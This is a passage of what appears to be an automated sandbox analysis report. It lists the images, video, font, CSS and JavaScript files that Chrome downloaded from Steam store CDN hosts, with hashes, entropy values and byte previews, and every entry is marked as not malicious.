        SHA-512:FAC4A2A58BA3A582AC62761CFBEF66106607EC20FC31F2413DAEEE61408CB034C374F7F002A3A569D160266B6F3D37DB273B74AA862AAEFF3B6C91BD8CC31FAA
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/icon_platform_linux.png
        Preview:.PNG........IHDR.....................pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 744 x 171, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):10863
        Entropy (8bit):7.893336023408476
        Encrypted:false
        SSDEEP:192:5ARjfa23tAJsqmbZEyI3ImwTHVeVUzp7C+22Z6XikPFffq0BV0FIZLKePlOoYWn4:5AfaItAJsfElI3jVwUzpC+JqNfC0wFIM
        MD5:A4E79C73EE13CB25B60FC4B0BA1F690C
        SHA1:B690C31B2EB1B0EB085E91AAAE7E79F03DEBE7C1
        SHA-256:6CB869DF089146C12EFB5E9C968E911C314842624BA6F052A11346AC734CADC8
        SHA-512:AAD423119F410A655F0AA475D2FE692087D7262C3986CE71347981C5B60F6A10031D7050BF9B9AEE4E7D84D814F0B8883C964028FCBE14ED3464602F3BA6CEC3
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.............4.i{....sRGB.........gAMA......a.....pHYs..........o.d..).IDATx^...}U......|.hp(..%1..H.DQ..(..H..HF..H..(.B1...hP.B1.."1..")...(."..I.".x.....:.9.......>.c....~....>..c.....7O?..sDDDDD.....QDDDDD.......S...g.Nj..........h.EDDD.F........N;.B.r..!.%.phm.9.....\DDDdr4.25..].:/..?%4...a...}.H.........]..!..qm.....|m..]DDDdp4.24...$....R..>....{..y.""""..A.! .....C.s.....0......""""}.A.>...{Co.../,..K1._.Qt*"""r..t..r.?.z..l.`.?......tB...@^..Ctb...h...QuZ;....$.A.\..zW.cN.r..c!"._....""".....pY..C.$.'CD.?......N4..+B..1PH.CD....`DDDDZ..G.6...G.!........Bg......M4..r...".\....OB..../""".....&Dy...1..:.\.bJ......t9.....2..w"....&....H.....C..!...t0...Qu...Y(F..u._.4..C..v0.Z....."./.....:eu&%@..B....""".@LqY&.?RZ.^.I..(ty.....,....xA.^.....oCo..|u&""".G..,.......S.KC.b...Y../.".?.i...;....SDDDf..}.\."rNz...u...:.UDDd.h......)_?....z..LDDDf..}.."r.9....].......Ht..6D..I.3.#..l.EDDd.h.....9.2_..zG..........8;..|..9..wWg"""
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):606
        Entropy (8bit):5.053190348815849
        Encrypted:false
        SSDEEP:12:s0Q5b014301XJ+zpovIls7WbcaMVIbD2vibDdZhVATCHqembDF+x:hQ1301ZkpRl+HV2DIoDDhksqTDF+x
        MD5:E7E1C965AD6FE3014F5DF3038BC6A6BC
        SHA1:703288EE6FA0BD90D30C0FDB20F2C232EB2EC1B7
        SHA-256:144716BE300FEBEDEF879AC760DA709802D6BD3D6BF17829D6D502BD88F3A822
        SHA-512:833FA54A7C1C8E4BAC2BF4606D7A3361F78E7837983C257DD681B5BCD08BEB111DC10C874EED7672C9032BFBD898468BCB311A25576F0CCE2FADB9142EAFEEF9
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/css/v6/user_reviews_rewards.css?v=5-HJZa1v4wFP&l=russian&_cdn=cloudflare
        Preview:...review_award_ctn {...padding-top:5px;..}.....review_award {...display: inline-block;...background-color: rgba(0, 0, 0, 0.2);...border-radius: 5px;...padding: 5px;...margin: 0 2px;...cursor: pointer;..}...review_award:hover {...background-color: rgba(255, 255, 255, 0.2);..}.....review_award_icon {...width: 20px;...height: 20px;...vertical-align: middle;..}......review_award_count {...color: #66c0f4;...font-size: 13px;...vertical-align: middle;...font-weight: bold;...padding: 3px;..}...review_award_count.hidden {...display: none;..}.....reward_btn_icon {...vertical-align: middle;...height: 16px;..}
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):2651
        Entropy (8bit):7.8170433430075414
        Encrypted:false
        SSDEEP:48:vi5aZ1d/oT2nsAThZfi4DNCnGOMyWhMlKp7QOP+U+AAZDtJSfcZL:vwaHd/oK3DNKMyrKp7QOGU+dJscd
        MD5:559EBD1876851C6276969E2E80D1C2D9
        SHA1:8510131F1B8BB218A353F33A124F34E14F5CFE46
        SHA-256:1A7AD30DB2470C198B1D76EC6B5229EC7C4F4415992A635B42CCD8613FF8DC97
        SHA-512:CE00E246EFE169476EBD1A762B2465B787E4EE4ED9723E1586CE34EB24EA9894F6A1A8646585752B3DBEA736C298579CFCF50E334ACD49A4C8410B010634DC75
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................?.........................!1.AQq."2a...34B....#Rr...$5C..bstu...............................".....................!1.A.Q.2q".............?...``.g.=..v}>..(y...-.2.]......^..4.+.r..I....3X..]..[.XF.T..q....-o..0q-..ZN..ppz.wS ..IH.@.b7$az..~4..8.F.Fp.t#.....<S....x.B..8*..1..q...TS.X"O....g.A...=.....A.2....l..N..^...B.;..@\..L.Aj...7.p..."..I..l.h..........I..W&......jZiW. VV...Fi....6.~.W. ..0...5..]t...R.1.?...|[...Q.;.I..B....cp>#,?......X+.d....0...`.....h.mGPv...[.. ..#.wR8..@.[.:.........$..T...;,2.A.(b;...,..a..l...@....:=&{.;K4...Z4m.vO.M(.R.$.U..Wd.f..W..Iy..q.....C....KCc......p..."`...B..n.bA.]....y-t.Rs..h-S;=|=......}...Lz...K'.B.......t....t.e....h"{.N...3...i>t...]C...p=.\...a@.....[.3...X`1..m..C.k2...0...0.S...[...(.C.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):62215
        Entropy (8bit):7.975301195397119
        Encrypted:false
        SSDEEP:768:zN1NjoT6zVBqXbInqqTPFPxbM/n888D2WIB1/4t+M6AKKVjfq3HCHI9YjcU5pj2f:zvXzVBqcq8LAB1/+bCHl9/UAi8qWxM4L
        MD5:C26D42BB591016FCF24A24D2A0D55896
        SHA1:E3F19C53E083DB01587F988526EA35B4F162774E
        SHA-256:D7F0C93CE78AD9082AB5775C5EB9E1849F227AE950EFC03127495E1E16BA18C9
        SHA-512:94021A19B90A6B345271BAB53008E5A46F9DEAE72240A0A0A6FBD0493C596F67786B34F8BD3FCE16C2FA372C1A4B702B2B54888B8D348E10C0E6050E4F17FE04
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/3008050/ss_7022d873a930614b0e57cdaae5e4d5a9ecd347ad.600x338.jpg
        Preview:......JFIF.....%.%.....C....................................................................C.......................................................................Q.X............................................e..........................!.1AQ."a..2q.....#BRS........$3CUVWrt..%458Db......&7ETcs....6u.Fe..'.d...................................B........................!.1Q..ARq...."2Sa....4...3B#br...5C$c.T.............?...;")m...s...Jp_...;f.)F..YD6.w.iA.U.......\....Q.A%y..)_D2..u...S.F..`..g.^...rq...a).jt.).m.!].#B..X........j..3..x..0........J.r.>...m...p..6l4.....77...m^....O8.c6.v..i..Q....4....7y...........q.R.Tf-..x.-.....b}..:F..9V.K.......[1.....a...=.q..+.......Q..Ggf.g]e!e!..% .......4.4.A.W..eRMM.~&....Rlg...BO..x..~.=...1^.].#...EJf..+..D........;......KN.#.[9...$...G.^.i.eF;.....Vu0........U.IyS...5..*|CH..Yy5..T...7'Q.;...YJs...I.1Y._.a:)...y..k...t-5'.S.U.....*..Y'.M}.q....u..JF.r...q-.........,J..f..v..uV.\...._R....'.FM..i..2.E%...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:WebM
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.993904851564544
        Encrypted:true
        SSDEEP:24576:rCR/ONEgIRUf7EsBeur/8eHiVdHMgDOTBb0Vz1MnIWAdgjw0:+/ONi7Ceu3HirsOO9b0VzWnt0gt
        MD5:6756EEB26BC6BCD583911DE938A194B1
        SHA1:B350E316DE4739A3954C1CC981D9A4FD925D7DBD
        SHA-256:151E3BDEAD67257D91F59160F020B2BB6AA558067C2544D7D1693BB0F9E4B7AA
        SHA-512:1A56B74B4E968F947BDF090DA1ED3AB421650F7E01B994AE005789EB50C6D7FD717F89653B71E41B3702D1CEC7245FDA81A8FD4163592DBA0262F36857975199
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie480_vp9.webm?t=1705420839:2f77e582f0cba3:0
        Preview:.E..B...B...B..B..B..webmB...B....S.g.....5...M.t.M..S...I.fS...M..S...T.kS...M..S...T.gS....M..S...S.kS...5..........W........................................................................................I.f.*...B@M..Lavf60.3.100WA.Lavf60.3.100D..A..@.....T.k@.........Q..s...c......."...eng..V_VP9...#..P*...V.......U..U...U...U...U...U...U...........Y..s..?F......"...eng..A_OPUSV..c..V.............@.p.....bd. c..OpusHead..8.........T.gA.ss.c..g.E..MAJOR_BRANDD..mp42g.E..MINOR_VERSIOND..0g.E..COMPATIBLE_BRANDSD..mp42mp41g.E..ENCODERD..Lavf60.3.100ss@.c..c...c....g.E..HANDLER_NAMED...Mainconcept Video Media Handlerg.E..VENDOR_IDD..[0][0][0][0]g.E..ENCODERD..Lavc60.3.100 libvpx-vp9g.E..DURATIOND..00:02:26.300000000..ss@.c..c..?F.....g.E..HANDLER_NAMED..#Mainconcept MP4 Sound Media Handlerg.E..VENDOR_IDD..[0][0][0][0]g.E..ENCODERD..Lavc60.3.100 libopusg.E..DURATIOND..00:02:26.312000000...C.u"+..................I.B@5P...8$.....Pa.:..\........g..."8k..<
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, progressive, precision 8, 500x250, components 3
        Category:downloaded
        Size (bytes):55032
        Entropy (8bit):7.967319755260824
        Encrypted:false
        SSDEEP:768:4Yyn4NpPmLHzCY9mTYfMzFKUCgegecg/0Iro8tuTwpvUBhCYPLp0Agn5VbeSmK4c:4ErmDhfUQDBtEmqXFE5VbedA
        MD5:355368C09AE89434B648D473EC54F5F4
        SHA1:36FFE749E3C296D6E57DA59F463CD2AA8F69B0D3
        SHA-256:AF611344E2754103ACEF3E836D8CDFD1970391514324A3495CC04128CAE9B672
        SHA-512:390540ADB50F913669816189B8B215F76D005489E87D073132D4F958FED52C5D0A49590499A14FEA6B2A1863EFE7DFD4046A087E61661B9EDF8805423021B22F
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/clusters/sale_autumn2019_assets/54b5034d397baccb93181cc6/deck_banner_animated_static_mobile_english.jpg?t=1713912919
        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 116 x 77, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):384
        Entropy (8bit):6.824517449327776
        Encrypted:false
        SSDEEP:6:6v/lhPojOWnDsiskT+wUqRP2VJQSag+yfLk0zxyxtzZwoJNkKkK1k42G90xrVEkB:6v/7oORiPTPOJTX8xXweb1k20JKk5cGZ
        MD5:90D994E852B5431144BD4BF2A6D415DE
        SHA1:E93F317B1A5925B85CBA3CCAC41BB05373F80DCE
        SHA-256:91B1719C9BE1F680861FB5E6194411A19A982BEE4D292440F2C911A001111E64
        SHA-512:7AA20C93A2FB57BD3B2093953D3A88881E1EED451AC0E2E416031887F6F6AA0339F2BD93CA77466BFC7D635A51E6706A7FB2D9DCB3F547159A503196103CC17B
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v5/game_highlight_activethumb.png
        Preview:.PNG........IHDR...t...M.....w.@B....tEXtSoftware.Adobe ImageReadyq.e<..."IDATx....m.0....b....A\..n..l....) a.n`..H..K...>..%R.\rI*..-.RZ}.m..u...k.......!x..R.S..:...G....`.....0.@.a.G..b.F.b.Q.@c`.:...4..s...3.j...5...o\.}.Q.M.O.w...v..w..G..a.....P..P..*..*...T@.T@........(P..P..P..*..*.@.T@.T@.........P..P..*..*...T@.T@.......jM.....^....F.)...0[.1.As....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):78350
        Entropy (8bit):7.983737487882643
        Encrypted:false
        SSDEEP:1536:1bkL039wBgZErD5fOy06WnaugyOoKaIqqP48W6/8fK7c3lq9ArCB2bDiey:dk7BtD526WnaurdKaLr8W60C9ACBK3y
        MD5:C95EDB1ADF2E60DE04484F7987B5753B
        SHA1:D6EE3A7331450EB3C37B95723FB9B4A0A4871890
        SHA-256:8F79DA18B5CD943A4451A06A965D9C387F703B3ED7B5843DCFC77B806C020F40
        SHA-512:F2F0CD2F7C245A8B4C022D83B2A2FF75FD8751B5500CB028385BED83A73199A23E5F4A625CFBFF85097B9F3C53B3899D56CE9EF53C431F4A0F7BDB4BB9A19728
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................R.........................!.1A.."Qaq.2..B....#Rb..3r..$...4CSs..6ct...%&5...7Dd...................................;........................!1A.Q."a.2q...#BR...3....Cb.$4r..............?..3G(O..0.8.P.Y.....t.....$..C....7.P.?\b...0....pn.P1....J..a.M...K,._.L.Z...+/..q$D...|*M.L..x...0+..._.3..F1*.0..ez.$......."..q"U.mc}...).U^..$...<X.,...].)X....e..Q...<...9c!.N.3...}Z..+V..".G.J..&..........y..t.0U@.~...h..../.hH.G...k.8....3...ka..E./...`.....A....)S^.*F..._.#{..Zx..M36w/NVI... n...8..jE..B.#!.*......&c %I;.0W.}....Cs....eC)...{.y.Q.@i > lV...T. .......0.!..U......E%ts.E..$>/#|Z3...J....[.-.<MV...ap5].....!.S-.Ty}_..i!..%..H.|t. ..)..9.Jv....0..n9?..H.g....J...A......>....?.-.3..!..H#u"..u4.6.".m.>......g.......Q.Q...t....j.....E.....y_.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 23 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansRegular Italic4.015;Plau
        Category:downloaded
        Size (bytes):135500
        Entropy (8bit):6.095878945953681
        Encrypted:false
        SSDEEP:3072:Jgo+yzfgnWNIIwF3vMTMgTO2QTb7W8YNfj9:sJWNIIK3vMaAfh
        MD5:7BC1837717CDC49C511EBDD0E75122A2
        SHA1:D31E0DF252328B946984C6BDE94F7B2F7C72D964
        SHA-256:97C39175B9C8C46A5F2BE987C00BE2EF556421FCDADA1ED3B327C50CC36CC78B
        SHA-512:53B31BDECDE75E8F50F82DB69728F6F831D6A3452062AC6E419F9369FFE88F0EA6ACE3A501D89501FF86FE47E05900ED5B482221D215898E28A0A4BB1F1B6A85
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015
        Preview:........... DSIG.......D....GDEF.|.@...,...:GPOS..m...h...ZGSUB.e.........POS/2u7.........`cmap.......t....cvt F...........fpgm.6!....T....gasp............glyf..,.........head...6......6hhea...........$hmtx..EH........locaX...........maxp........... name..Dt........post.v.........prep.......l...................................w...x.y...z.3.........&.W.............D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J......................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):73624
        Entropy (8bit):7.980918433419721
        Encrypted:false
        SSDEEP:1536:q5vduvMscdXEQCFbW/d5fwUPmAQUtrgjr8RqGGdwdcFuY7:q5vCtFEw+QUtkkRqGHyF37
        MD5:B291EA7B31C1DB3680823B10F89D02AF
        SHA1:2C0FB35553A013A6BEFD07FBB0C115214C2B2703
        SHA-256:F35ADB225FC1B198CE52FF23D4E3E07DD45460E8032A642BAC5B6857E94809FA
        SHA-512:19004A6E5D3D57D619CE13D93FF1568B5E64B1C619D8AE86AA9EA816475C27A6826B09B401B9CCF524092EB301BDC87061DCF6E1FCA488F883D6C673FB794FAB
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................P.........................!.1A.."Qaq.2..#....BR..3b..$Cr.4....S...%cs..5DETd...................................;........................!1A."Q.2qa.B....#3....R.4br..5CS.............?..*~.8:..y._.....Q....L....z)d....y0..`o........]'.....A.........u.2.........6.$7\Y....)......p...IQ^.y.q.....!..f_.UmD..{cKH...Z......5.>.....'.2............R..AQspz....=.....x..^.J.,.(e.@.S[^..r.^8.:m...c}.G6U...P.Q.:l.,...#+..4H..Ab......0m..|b.D..f..A....iU-./$$.P..,@.W....1>(.%.c!..om..8.~...7m.)..vG@.....s...t.]..Y.d.$........u..{...U........8.%..2.<...YB..h....65..3.y)..kO#..r..'I..b......|.`.....Y.y..vk.LT..+..@.6.q..!...|r8.....J.=4....b.a.......c.,G.o...f....d<.['..:?.Q.........R.....7U,..Qj.h........sM:..c.1..g.-U..O v...lT.rE..E....f.*.5.0...B....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):6047
        Entropy (8bit):7.910148285734931
        Encrypted:false
        SSDEEP:96:H1POxfEIhgnNm7rBb1RBUsslsnTHOfnP3qVXdCGaJfF0SH:H9mfEIh8eV1crOTHOvoXs/JffH
        MD5:4CA61F59528D4C3C595210687BEA09DB
        SHA1:4CD03D1482D9BC226A28E5BEF2E376239DEED040
        SHA-256:5B1FE120FE756E3D964DCD39B073E0B8C4F918018FBE2E73443CF6AE86613459
        SHA-512:19F96961E48B96D867A027889D5A79AFE6FAA8498FA8EC10A1DBB9C65A2721F9072FA30F25F8BD931E093A1DCBDB67097BC33AEB63C82AF20573F59E77890C1C
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2778580/capsule_184x69.jpg?t=1716480811
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................;...........................!.1A.."Q#2a.B....3Rb....$q....................................2.......................!.1AQ.."aq......2...$..#R............?.....}W.k..U%...OH_.l#.k?.O..li.O...-ccO*j....q..........aRe.~$.?..O.}....X.............Z. ...{b.....h%2b!.;..9s% d.........Z.I..vJ....V;....ne'l...K.<..,4+.H_.}..W..s.~^]x..O...yu...._.p..~....Z......-...e......?S.?...M.c....&.e..9..p...4....h.@.....4....h.@...h..7...f,..SYu`=6N|...g........}..c.6..K_7.T1..WL......l....Yu..f.t"j.mN..d..'...}.;...yO..i....y........f.O.7.......?.z}F..<.YO.1%.. ..G..,....~.:...J6].vO...........F.ykZO..........L.Z....[.+).........G....H.y..A.}."\... .......wWo{..x...H,..).m.....w..=.y.....ol.....e..Ex..P......3.........8.....cX0`......{..#>.......g=...q.t2e-.{.=..t`....IZ.Z.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):9318
        Entropy (8bit):5.299236226685305
        Encrypted:false
        SSDEEP:192:3mqlY8tyyVg9ynE4QzJ/kZYrzh9xdyYRfeB+R2ZavAAL7WDu:3VoQw7/6ueBzwvAALD
        MD5:B23A2EA37FB7DC6A317180ACB9640BBA
        SHA1:559826C6B73A59BCCF54F9034D7E8C43D03C091A
        SHA-256:23D2A8FBAA5A5F1F551B5D70440ADEE80FD519B52B3D6559CBBEA35296679E2F
        SHA-512:E946116847558894E42E26E6702B600531E85CD0DA91076E8AF2FB3FECE913F5FF4E8AA8744D2D43AFA58AB2A0289954726434946E158FC840C150F2A079F109
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/dselect.js?v=sjouo3-33Gox&l=russian&_cdn=cloudflare
        Preview:..var g_ActiveDropLists = {};..var g_LastSelectHideTime = 0;..var g_fnGPOnClosingModalWindow = null;....$J(function() {...$J(document).on( 'keydown', HandleKeyDown );..});....function HandleMouseClick( e, key )..{.....if ( !g_ActiveDropLists[key] )....return;.....var $Trigger = $J('#'+key+'_trigger');...var $Droplist = $J('#'+key+'_droplist');.....var $Target = $J( e.target);...if ( //$Trigger.is( e.target ) || $J.contains( $Trigger[0], e.target ) ||....$Droplist.is( e.target ) || $J.contains( $Droplist[0], e.target ) )....return;......DSelectHide( key );..}....var TYPEAHEAD_TIMEOUT_MS = 750;..var g_timeLastCharEvent = 0;..var g_strTypeahead = '';....function HandleKeyDown( e )..{...var bSwallowEvent = false;...var keynum = e.which;.....if ( e.altKey || e.ctrlKey )...{....// bail out now so the browser can do it's thing....return;...}.....var bCharEvent = false;...switch ( keynum )...{......case 40: ..case 38: ..case 13: ..case 9: ..case 34: ..case 33: ..case 36: ..case 35: ..case 27:
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (57851), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):58046
        Entropy (8bit):5.004825187457945
        Encrypted:false
        SSDEEP:1536:s7aiXrClR0oLeh4iS726I7CsrpzAuIRmE:EklR1Leh4iS79I7CsmuIRmE
        MD5:8D4A5EA4013FD55EF27F1427DA71432B
        SHA1:0F9D4FBEB0EBA5477665AD31CB3D135CBFE5FFDD
        SHA-256:542CC3E6E4DAA5960A449A35A22D159CB9F70C45339C8F4C6E920758C4D821A9
        SHA-512:BCAF35FCA5F7605426176C5C523D582408EEDD930E4AE75ABC552BF63568BB2C01E6E313DA70913D29001F9E3BBDAE7D4D1F16B94E4B3F22537CD9E7CD5340DA
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/main_english-json.js?contenthash=6c5add9f48c608fe2aaa
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[6815],{63336:e=>{e.exports=JSON.parse('{"language":"english","CuratorAdmin_RSSFeed_title":"Manage my RSS Feeds","CuratorAdmin_RSSFeed_desc":"Setting up RSS feeds allows you to automate the Steam Events and Announcement creation from your existing content management platform. Your content from your site will automatically surface to Steam customers who follow you as News. ","CuratorAdmin_RSSFeed_lang_only":"Feed Language:","CuratorAdmin_Curator_lang_only":"NOTE: The curator is set to %1$s language which is different from the feed language of %2$s. Re-save the feed to update to this language.","CuratorAdmin_RSSFeed_lang":"The language is set on the group to \'%1$s\'. If this is not correct, you can edit the group profile and then re-setup this feed.","Cu
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):8856
        Entropy (8bit):7.942818324768091
        Encrypted:false
        SSDEEP:192:4viBHqIPU09TO+yS75NlOgTnYC5kd2Axi72Yi/2pNLksphNj:eiHzUu1yS75nYC5w2AxI2YiWSsph1
        MD5:B558978285A43C4FCE2E9852A16DBA76
        SHA1:F7E08B2DBC20C9F8044F2A1AD6D7F4ACFE129B6B
        SHA-256:A1A1E7CE6BCB28E82BC5E365CCF4AC3F83600C38B636736ACFB64B5215A91C8D
        SHA-512:8FFFBA5B11D26B0029512012CF58781FF3D5277DEF7441D3E9EFC4E3054B35B4F8EE465DC975B217400765788B5CE9BDE931388DDCC50B8B83F0BA89964802ED
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1145350/capsule_184x69.jpg?t=1715727000
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................X...........................!.1..AQ"a2q.....#B..$&RV.......3c....%467CFSTbdrsu.........................................C......................!..1.AQ.."aq..2r.........CDRT.....5BS#$b..%............?....Y./.ve..1......bc.@..X*........W..Ml.V...A....I..|.Z.....5....m_....>.......8.V..m.]...E...:...xy...9......I.S..m....E.../.........g.lY.<..V.Q.}..6..........EO...._.i.2.......;_..S..g.(.%..s......s.......s.....4. . 5.>.G.$..o.[......cc~...~........k.)..mT...}.1U.z..K.q.v.-.&-u...p'.o........Ll...o..d.b....b...5!..J...B..w.....$.k.....$]e.6...QuZxF.......H.cI=KIN.mv....QM@.......,..Wn=.^g..^I..O`q.......$ ..W.(+...4!.....y..w^..Vw...oo\Z.D.+}.....1..-..kyPL...qI[.....&.G|....3....){......U.....A.l../..;.X?.y.U..z..6..}B.......E....'.........w.-.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):6141
        Entropy (8bit):7.919155069170763
        Encrypted:false
        SSDEEP:96:aS3ZSjd8/UxWdZPBcEI0e0l4UCXYkPUt8i3uO+67EATsFmvxWua6mDZmB5gn0thS:aS3MGU8PPBcEPeQkXYnujSEIAmvwWHgx
        MD5:C5EA3DCA33CFBC348E80BDA34661FB43
        SHA1:1D89CC714C9D0463A4ED73F3F0435BCF227710EC
        SHA-256:55B2E69DAA4F011FC8A193507DF12A127BC2FCCE5AD145FE51C06913448CEF2C
        SHA-512:BB47F473D664E45366670B761927FBF0347499851FC6DDE6BB2C7C779C2F3B898579864635FE2BCCF6D9C57577B5F153B54711FFC31D52227BA609132237B9B1
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/306130/capsule_184x69.jpg?t=1714743018
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................7...........................!1.A."Qa.2Bq..#....$R..3CS...............................+......................!.1AQ."a.#.2..Rq...............?......t"L.s.._74z.{:.a\..6}9.T.*.yzH..3...d.vN..n..(.h.3.8/.....~....96..x6...*..O.I.Y&.+P.8.G.#Kf..vE......@....x.z'.x.....L.jS.6YC.?/.C.}......X.k.y|.}n..s'.O.@...?H.B..>N.s.y......y.X..V.Yv.1..f.1.*........6J.t....).M......2i.Do5..............v.n'...g..m.qK....,.{....;O.G...%......G.$0..>5.,.8.)5..t<q)E...W~..v..,-...Q.......E7.>...?S..N.")#..37#...4.U.......{.>t..,..&.r..Q.2H{kU.......i....+T7esxS+...WSc.u........g.S...{J......PC,`v..........m..KQ"...4t.0=.I..._n..^/5.<* @...F.V/d[..{bJ....L>fR....>...z*.[v;-.m2..*.c@......M..-._)..ZiYG`.......^.E...=...M.#!..;.=...2....L.. ...}d.O.c.....1.:r.......O...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (65369), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):69467
        Entropy (8bit):5.646739380657263
        Encrypted:false
